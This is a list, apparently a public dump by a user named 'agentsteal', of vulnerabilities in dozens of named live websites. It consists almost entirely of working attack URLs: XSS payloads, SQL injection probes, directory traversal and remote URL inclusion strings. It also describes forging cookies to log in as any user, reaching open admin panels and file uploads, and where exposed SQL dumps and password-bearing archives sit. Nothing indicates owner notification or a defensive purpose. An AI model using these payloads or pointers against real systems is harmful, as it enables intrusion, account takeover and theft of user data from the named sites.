agentsteal

Array: http://www.blconline.co.uk/whois/index.blc?lookup&domain[] Cross Site Scripting: http://www.blconline.co.uk/whois/index.blc?lookup&domain="><marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.blconline.co.uk/directory/dirupdate.php?www[] Full Path Disclosure: http://www.blconline.co.uk/login/userpics/delimg.blc Full Path Disclosure: http://www.blconline.co.uk/login/userinfo.blc Full Path Disclosure: http://www.blconline.co.uk/price/popupprice.blc Full Path Disclosure: http://www.blconline.co.uk/inc/right.blc Full Path Disclosure: http://www.blconline.co.uk/inc/footer.blc Includes Directory: http://www.blconline.co.uk/login/include/ META Tag Injection: http://www.blconline.co.uk/whois/index.blc?lookup&domain=<meta+http-equiv='Set-cookie'+content='vulnerable=true'> URL Inclusion: http://www.blconline.co.uk/directory/dirupdate.php?www=http://www.google.com/

Admin Access: Anyone can access the admin panel. Array: http://www.xxxxxxx.co.uk/projects/filehost/admin/bans.php?action=unban&ip[] Cross Site Scripting: There is Cross Site Scripting on http://www.xxxxxxx.co.uk/projects/filehost/admin/bans.php if the fields contain code. Cross Site Scripting: There is Cross Site Scripting when you register if your username contains </script>code. Directory Transversal: There is Directory Transversal if your username contains ../ Full Path Disclosure: http://www.xxxxxxx.co.uk/projects/filehost/success.php.old Full Path Disclosure: http://www.xxxxxxx.co.uk/projects/filehost/admin/bans.php Full Path Disclosure: http://www.xxxxxxx.co.uk/projects/filehost/admin/settings.php Includes Directory: http://www.xxxxxxx.co.uk/projects/filehost/includes/ Insecure Cookie: You shouldn't put the username in the cookie. SQL Error: There is an SQL Error if you log in if the username contains ' If your username contains ' when you log in the page contains an MD5 of your password.

Cross Site Scripting: http://www.helraizer.co.uk/guestbook/ddgb1.php5/"><marquee><h1>vulnerable Full Path Disclosure: There is Full Path Disclosure on http://www.helraizer.co.uk/guestbook/config.php if the PHPSESSID cookie contains an invalid value. Full Path Disclosure: There is Full Path Disclosure on http://www.helraizer.co.uk/guestbook/ddgb-verify.php if the PHPSESSID cookie contains an invalid value.

Cross Site Scripting: There is Cross Site Scripting in the uploaded files. Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. You can log in as any user by changing the name cookie and the password cookie to their username and password.

Array: http://www.270studios.com/270forums/viewforum.php?f[] Array: http://www.270studios.com/270forums/captcha.php?randomkeys[] CAPTCHA: The solution for the CAPTCHA is in the source code. Cross Site Scripting: http://www.270studios.com/270forums/viewforum.php?f="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on http://www.270studios.com/270forums/ucprofile.php if the fields contain "code. Full Path Disclosure: http://www.270studios.com/270forums/viewcat.php?c=' Full Path Disclosure: http://www.270studios.com/270forums/viewforum.php?f=' User Enumeration: http://www.270studios.com/~mike270 User Enumeration: http://www.270studios.com/~nobody User Enumeration: http://www.270studios.com/~root

Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/vehicle_add.php if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/vehicle_add.php if you submit the same vehicle multiple times. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/ro_start.php if the drop down menu contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/ro_addjob.php if the drop down menus contain ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/ro_deljob.php if the drop down menus contain ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_start.php if the drop down menu contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_addpart.php if the drop down menus contain ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_view.php if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_view.php if the drop down menu contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/pi_close.php if the drop down menu contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/customer_mod.php if the drop down menu contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/vehicle_mod.php if the drop down menu contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/service_mod.php if the drop down menu contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/parts_mod.php if the drop down menu contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/parts_del.php if the fields contain code. Cross Site Scripting: There is Cross Site Scripting on http://www.debianbox.net/sms/admin/adduser.php if the fields contain code. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/vehicle_add.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/ro_start.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on http://www.debianbox.net/sms/ro_addjob.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on http://www.debianbox.net/sms/ro_deljob.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/pi_start.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on http://www.debianbox.net/sms/pi_addpart.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/pi_view.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/pi_close.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/customer_mod.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/vehicle_mod.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/service_mod.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/parts_mod.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.debianbox.net/sms/tune_download.php you can submit arbitrary values. Full Path Disclosure: http://www.debianbox.net/sms/home.php Full Path Disclosure: http://www.debianbox.net/sms/include/auth.php Full Path Disclosure: http://www.debianbox.net/sms/pi_start.php Full Path Disclosure: There is Full Path Disclosure on http://www.debianbox.net/sms/tune_add.php if you upload a file. Full Path Disclosure: There is Full Path Disclosure on http://www.debianbox.net/sms/tune_download.php if the drop down menu contains an invalid value. Includes Directory: http://www.debianbox.net/sms/admin/ Includes Directory: http://www.debianbox.net/sms/include/ SQL Error: http://www.debianbox.net/sms/admin/listros_unpaid.php SQL Error: http://www.debianbox.net/sms/invoice_start.php SQL Error: http://www.debianbox.net/sms/service_add.php SQL Error: http://www.debianbox.net/sms/parts_add.php SQL Error: http://www.debianbox.net/sms/parts_mod.php SQL Error: http://www.debianbox.net/sms/parts_del.php SQL Error: http://www.debianbox.net/sms/letter_thankyou.php SQL Error: There is an SQL Error if you add a new customer. SQL Error: There is an SQL Error if you register the same vehicle multiple times. SQL Error: http://www.debianbox.net/sms/pi_created.php SQL Error: There is an SQL Error on http://www.debianbox.net/sms/pi_close.php if the drop down menu contains an invalid value. SQL Error: There is an SQL Error on http://www.debianbox.net/sms/invoice_paid.php if the fields contain invalid values. SQL Error: There is an SQL Error on http://www.debianbox.net/sms/parts_del.php if the fields contain invalid values. User Enumeration: http://www.debianbox.net/~justin

Array: http://www.skoogo.com/search.php?search_forum_text[] Cross Site Scripting: http://www.skoogo.com/search.php?search_forum_text="><marquee><h1>vulnerable</marquee> Drop Down Menu: If you edit the drop down menus on the search page you can submit arbitrary values. Full Path Disclosure: http://www.skoogo.com/misc/auto/book_auto.php Full Path Disclosure: http://www.skoogo.com/misc/auto/concentration_auto.php Full Path Disclosure: http://www.skoogo.com/misc/auto/network_auto.php Full Path Disclosure: http://www.skoogo.com/misc/auto/school_auto.php Full Path Disclosure: http://www.skoogo.com/misc/auto/test.php Full Path Disclosure: http://www.skoogo.com/misc/auto/test_auto.php Full Path Disclosure: http://www.skoogo.com/misc/auto/default.php Full Path Disclosure: http://www.skoogo.com/userinfo.php?user[] Full Path Disclosure: http://www.skoogo.com/register.php?code[] Full Path Disclosure: http://www.skoogo.com/search.php?subsearchforum Full Path Disclosure: http://www.skoogo.com/templates/filters/filter_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/keywords_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/book/addbook_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/book/book_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/concentration/concentration_news_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/concentration/concentration_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/course/addcourse_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/course/course_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/course/searchcourse_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/network/addnetwork_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/network/network_news_t.php Full Path Disclosure: http://www.skoogo.com/templates/filters/network/network_t.php Full Path Disclosure: http://www.skoogo.com/templates/forum/editpost_t.php Full Path Disclosure: http://www.skoogo.com/templates/forum/newtopic_t.php Full Path Disclosure: http://www.skoogo.com/templates/forum/replytopic_t.php Full Path Disclosure: http://www.skoogo.com/templates/forum/topiclist_fp_small_t.php Full Path Disclosure: http://www.skoogo.com/templates/forum/topiclist_fp_t.php Full Path Disclosure: http://www.skoogo.com/templates/forum/topiclist_t.php Full Path Disclosure: http://www.skoogo.com/templates/forum/viewtopic_t.php Full Path Disclosure: http://www.skoogo.com/templates/index2_t.php Full Path Disclosure: http://www.skoogo.com/templates/index3_t.php Full Path Disclosure: http://www.skoogo.com/templates/misc/contact_t.php Full Path Disclosure: http://www.skoogo.com/templates/misc/forgotpass_t.php Full Path Disclosure: http://www.skoogo.com/templates/misc/search_results_t.php Full Path Disclosure: http://www.skoogo.com/templates/misc/reportpost_t.php Full Path Disclosure: http://www.skoogo.com/templates/misc/search_t.php Full Path Disclosure: http://www.skoogo.com/templates/user/login_t.php Full Path Disclosure: http://www.skoogo.com/templates/user/main.php Full Path Disclosure: http://www.skoogo.com/templates/user/setprofile_t.php Full Path Disclosure: http://www.skoogo.com/templates/user/useredit_t.php Full Path Disclosure: http://www.skoogo.com/templates/user/userinfo_t.php Full Path Disclosure: http://www.skoogo.com/phpinfo.php SQL Injection: http://www.skoogo.com/viewtopic.php?action=g&topic=20"+and+"1"="0 http://www.skoogo.com/viewtopic.php?action=g&topic=20"+and+"1"="1

Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/craigmail.php if the craigprofile field contains </textarea>code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the status field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the outAct field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the myAge field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the myAppearance field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the inAct field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the looking field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the minAge field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the maxAge field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the minHeightFt field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the minHeightln field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the maxHeightFt field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the maxHeightln field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the flavor field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.pquery.com/profile/makeprofile.php if the theirConfidence field contains code. Drop Down Menu: If you edit the drop down menus on http://www.pquery.com/profile/maker.php you can submit arbitrary values. Includes Directory: http://www.pquery.com/profile/ PHP Source Code Disclosure: http://www.pquery.com/profile/htmlparser.inc User Enumeration: http://www.pquery.com/~nobody User Enumeration: http://www.pquery.com/~root

User Enumeration: http://www.jobspokhara.com.np/~nobody User Enumeration: http://www.jobspokhara.com.np/~root

Array: http://www.vghunter.net/comment.php?gn[] Array: http://www.vghunter.net/game.php?gn[] Cross Site Scripting: http://www.vghunter.net/game.php?gn='><marquee>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Directory Transversal: You can make txt files in any directory by posting comments with the gn field set to ../filename. Directory Transversal: http://www.vghunter.net/game.php?gn=../../agentsteal You can make txt files in http://www.vghunter.net/games/ by posting comments with the gn field set to the filename.

Array: http://www.mcatzone.com/glosslet.php?letter[] Array: http://www.mcatzone.com/mark_rand.php?a20[] Array: http://www.mcatzone.com/mark_spec.php?answer[] Cross Site Scripting: http://www.mcatzone.com/glosslet.php?letter="><marquee>vulnerable</marquee> Cross Site Scripting: http://www.mcatzone.com/mark_spec.php?answer=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.mcatzone.com/mark_rand.php?a20=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the drop down menu on http://www.mcatzone.com/testsetting.php contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.mcatzone.com/testsetting.php if the fields contain code. Directory Transversal: http://www.mcatzone.com/glosslet.php?letter=../../icons/binary Drop Down Menu: If you edit the drop down menu on http://www.mcatzone.com/testsetting.php you can submit arbitrary values. Includes Directory: http://www.mcatzone.com/include/ Maximum Length: If you edit the input boxes on http://www.mcatzone.com/testsetting.php you can remove the maximum lengths. PHP Source Code Disclosure: There is PHP Source Code Disclosure on the 404 page. SQL Error: SQL Error: There is an SQL Error on http://www.mcatzone.com/testsetting.php if the fields contain invalid values. User Enumeration: http://www.mcatzone.com/~root

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting on the edit profile pages if the fields contain ">code. Directory Transversal: http://www.test.gimppro.co.uk/admin/logout.php?p=a/../ Drop Down Menu: If you edit the drop down menus on the edit profile pages you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the create counter page you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the register page you can submit arbitrary values. Full Path Disclosure: http://www.test.gimppro.co.uk/admin/logout.php?p[] Full Path Disclosure: http://www.test.gimppro.co.uk/footer.php Full Path Disclosure: There is Full Path Disclosure if the cookname cookie is an array. Full Path Disclosure: There is Full Path Disclosure if the cookpass cookie is an array. Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is an array. Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. SQL Error: URL Inclusion: http://www.test.gimppro.co.uk/admin/logout.php?p=http://www.google.com/ User Enumeration: http://www.test.gimppro.co.uk/~root You can log in as any user by setting the cookname and cookpass cookies to their username and password hash.

Array: http://php-radio.dream-code.net/index.php?page[] Array: http://php-radio.dream-code.net/index.php?station[] Array: http://php-radio.dream-code.net/playlist.php?type[] Cross Site Scripting: http://php-radio.dream-code.net/index.php?station=</title><marquee><h1>vulnerable Cross Site Scripting: http://php-radio.dream-code.net/index.php?station=<marquee><h1>vulnerable Directory Transversal: http://php-radio.dream-code.net/index.php?page=a/../index Full Path Disclosure: http://php-radio.dream-code.net/pages/playlist.php Full Path Disclosure: http://php-radio.dream-code.net/pages/users.php Full Path Disclosure: http://php-radio.dream-code.net/pages/stations.php Full Path Disclosure: http://php-radio.dream-code.net/pages/admins.php Full Path Disclosure: http://php-radio.dream-code.net/pages/addsongs.php Full Path Disclosure: http://php-radio.dream-code.net/pages/logout.php URL Inclusion: http://php-radio.dream-code.net/index.php?page=http://www.google.com/ User Enumeration: http://php-radio.dream-code.net/~root

Admin Access: The PHP Source Code Disclosure reveals your password. Cross Site Scripting: There is Cross Site Scripting on http://www2.iqlogin.net/mr_layoutguy/intro.php if the fields contain ">code. Full Path Disclosure: http://www2.iqlogin.net/admin/ Full Path Disclosure: http://www2.iqlogin.net/design/submit.php Full Path Disclosure: http://www2.iqlogin.net/dsl/page-views.php Full Path Disclosure: http://www2.iqlogin.net/download/iql-online-1.1/module.php Full Path Disclosure: http://www2.iqlogin.net/inc/modules/member_menu.php Full Path Disclosure: http://www2.iqlogin.net/inc/modules/other_menu.php Full Path Disclosure: http://www2.iqlogin.net/user/activate.php Full Path Disclosure: http://www2.iqlogin.net/inc/modules/users_active.php Includes Directory: http://www2.iqlogin.net/inc/ Includes Directory: http://www2.iqlogin.net/site/ PHP Source Code Disclosure There is PHP Source Code Disclosure on multiple pages if you add ~ at the end of the URL. SQL Dump: http://www2.iqlogin.net/tables.sql

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. DOS: There is a DOS if you run multiple battles at the same time. Maximum Length: If you edit the input boxes you can remove the maximum lengths. You can search for contestants that are less than 4 characters by including special characters that google doesn't use in the search.

Full Path Disclosure: http://www.linuxjobworld.com/profile.php?mode[]

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if the regex contains ~code~. Cross Site Scripting: There is Cross Site Scripting if the haystack contains ~code~.

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Log: http://www.gfx-depot.com/league/log.txt

Admin Access: You can upload PHP scripts. Cross Site Scripting: http://www.flash-portal.org/fp-quick/upload/index.php Full Path Disclosure: http://www.flash-portal.org/fp-quick/upload/c.php Full Path Disclosure: Full Path Disclosure: http://www.flash-portal.org/fp-quick/?page=watch&subID=24 You can access other users' files by changing the subID in http://www.flash-portal.org/fp-quick/?page=watch&subID=21

Array: http://www.stargateud.com/~remotepa/modules.php?name=News&op=rate_complete&sid=4&score[] Array: http://www.stargateud.com/index.php?page[] Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Cross Site Scripting: http://www.stargateud.com/index.php?page=battlefield&listpage=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.stargateud.com/~remotepa/modules.php?name=News&op=rate_complete&sid=4&score=<marquee><h1>vulnerable</marquee> Directory Transversal: http://www.stargateud.com/index.php?page=../stargateud/rules Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/faq Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/groupcp Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/index Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/login Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/memberlist Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/posting Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/search Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/viewforum Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/viewonline Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/viewtopic Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/privmsg Full Path Disclosure: http://www.stargateud.com/index.php?page=forums/profile Full Path Disclosure: http://www.stargateud.com/index.php?page=battlefield&listpage[] Full Path Disclosure: http://www.stargateud.com/battlefield.php Full Path Disclosure: http://www.stargateud.com/report.php Full Path Disclosure: http://www.stargateud.com/forgotpass.php Full Path Disclosure: http://www.stargateud.com/stats.php Full Path Disclosure: http://www.stargateud.com/base.php Full Path Disclosure: http://www.stargateud.com/index.php?page=index Full Path Disclosure: http://www.stargateud.com/register.php Full Path Disclosure: http://www.stargateud.com/players_online.php Full Path Disclosure: http://www.stargateud.com/index.php?page=a User Enumeration: http://www.stargateud.com/~remotepa User Enumeration: http://www.stargateud.com/~root

Array: http://www.knightlyfood.com/food.php?c[] Cross Site Scripting: http://www.knightlyfood.com/food.php?c=</title><script>alert(1337)</script> Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting if your username contains ">code. Cross Site Scripting: There is Cross Site Scripting if the reviews contain code. Cross Site Scripting: There is Cross Site Scripting on the forgotten password page if the fields contain ">code. Drop Down Menu: If you edit the category drop down menu you can submit arbitrary values. Full Path Disclosure: http://www.knightlyfood.com/search.php

Admin Access: http://www.commabunny.org/v8/CB_BBS_8.5_20071012.tar.gz contains your password. Admin Access: You can upload and delete any files on the server on http://www.commabunny.org/public/pub/. Array: http://www.commabunny.org/blog/pt.php?b[] Array: http://www.commabunny.org/v8/vt.php?b[] Array: http://www.commabunny.org/v8/st.php?b[] Full Path Disclosure: http://www.commabunny.org/vt.php Full Path Disclosure: http://www.commabunny.org/0.php Full Path Disclosure: http://www.commabunny.org/v8/stuff/l.php Full Path Disclosure: http://www.commabunny.org/v8/stuff/l_s.php Full Path Disclosure: http://www.commabunny.org/v8/stuff/l_t.php Full Path Disclosure: http://www.commabunny.org/blog/l.php Log: http://www.commabunny.org/v8/admin/p.php MySQL Error: http://www.commabunny.org/v8/pt.php MySQL Error: http://www.commabunny.org/v8/sp.php MySQL Error: http://www.commabunny.org/v8/v.php SQL Dump: http://www.commabunny.org/v8/New Text Document.txt SQL Error: http://www.commabunny.org/v8/vt.php SQL Error: http://www.commabunny.org/v8/st.php SQL Injection: http://www.commabunny.org/v8/vt.php?num=186 AND 1=1&b=1 http://www.commabunny.org/v8/vt.php?num=186 AND 1=2&b=1 SQL Injection: http://www.commabunny.org/v8/vt.php?num=186&b=1 AND 1=1 http://www.commabunny.org/v8/vt.php?num=186&b=1 AND 1=2

Full Path Disclosure: There is Full Path Disclosure if you set the PHPSESSID cookie to an invalid value. Full Path Disclosure: There is Full Path Disclosure on http://www.fairslice.com/index.php?dest=search if a search contains an invalid character.

Array: http://www.giftpathways.com/wishlist.php?u[] Cross Site Scripting: http://www.giftpathways.com/wishlist.php?u=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/wishlist.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/spread.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/login.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable Cross Site Scripting: There is Cross Site Scripting if a group ID contains ">code. Cross Site Scripting: http://www.giftpathways.com/profile.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/item.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/print.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/statistics.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/groups.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/food.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/activity.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/spread.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/invite.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/lockmembership.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/contact.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.giftpathways.com/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting if your username contains ">code. Drop Down Menu: If you edit the drop down menus on the group creation page you can submit arbitrary values. SQL Error: http://www.giftpathways.com/login.php/" SQL Error: http://www.giftpathways.com/contact.php/" SQL Error: http://www.giftpathways.com/groups.php/" SQL Error: http://www.giftpathways.com/profile.php/" SQL Error: http://www.giftpathways.com/index.php/" SQL Error: http://www.giftpathways.com/index.php/" SQL Error: http://www.giftpathways.com/index.php/" SQL Error: http://www.giftpathways.com/index.php/" SQL Error: http://www.giftpathways.com/index.php/" SQL Error: http://www.giftpathways.com/index.php/" SQL Error: http://www.giftpathways.com/item.php/" SQL Error: http://www.giftpathways.com/print.php/" SQL Error: http://www.giftpathways.com/statistics.php/" SQL Error: http://www.giftpathways.com/food.php/" SQL Error: http://www.giftpathways.com/lockmembership.php/" SQL Error: http://www.giftpathways.com/activity.php/" SQL Error: http://www.giftpathways.com/spread.php/" SQL Error: http://www.giftpathways.com/invite.php/" SQL Error: There is a SQL Error if the drop down menus on the group creation page contain invalid values. SQL Error: http://www.giftpathways.com/spread.php/" SQL Error: http://www.giftpathways.com/wishlist.php?u=' SQL Error: http://www.giftpathways.com/wishlist.php?u=a SQL Error: http://www.giftpathways.com/wishlist.php/"

Cross Site Scripting: http://www.toxicana.com/forum/register.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the ID_my_site cookie contains code. Cross Site Scripting: There is Cross Site Scripting in the forum if a post contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Cross Site Scripting: http://www.toxicana.com/forum/login.php/"><marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.toxicana.com/forum/view_topic.php?id[] Full Path Disclosure: http://www.toxicana.com/forum/view_topic.php?page[] Full Path Disclosure: http://www.toxicana.com/forum/members.php?page=a Full Path Disclosure: http://www.toxicana.com/forum/edit_topic.php?id Full Path Disclosure: http://www.toxicana.com/forum/main_forum.php?page=a Full Path Disclosure: http://www.toxicana.com/forum/del_topic.php?id[] Insecure cookie: You shouldn't put the username in the cookie. User Enumeration: http://www.toxicana.com/~toxicana User Enumeration: http://www.toxicana.com/~root You can log in as any member by changing the username cookie to their username. You can log in as Array if the ID_my_site cookie is an array.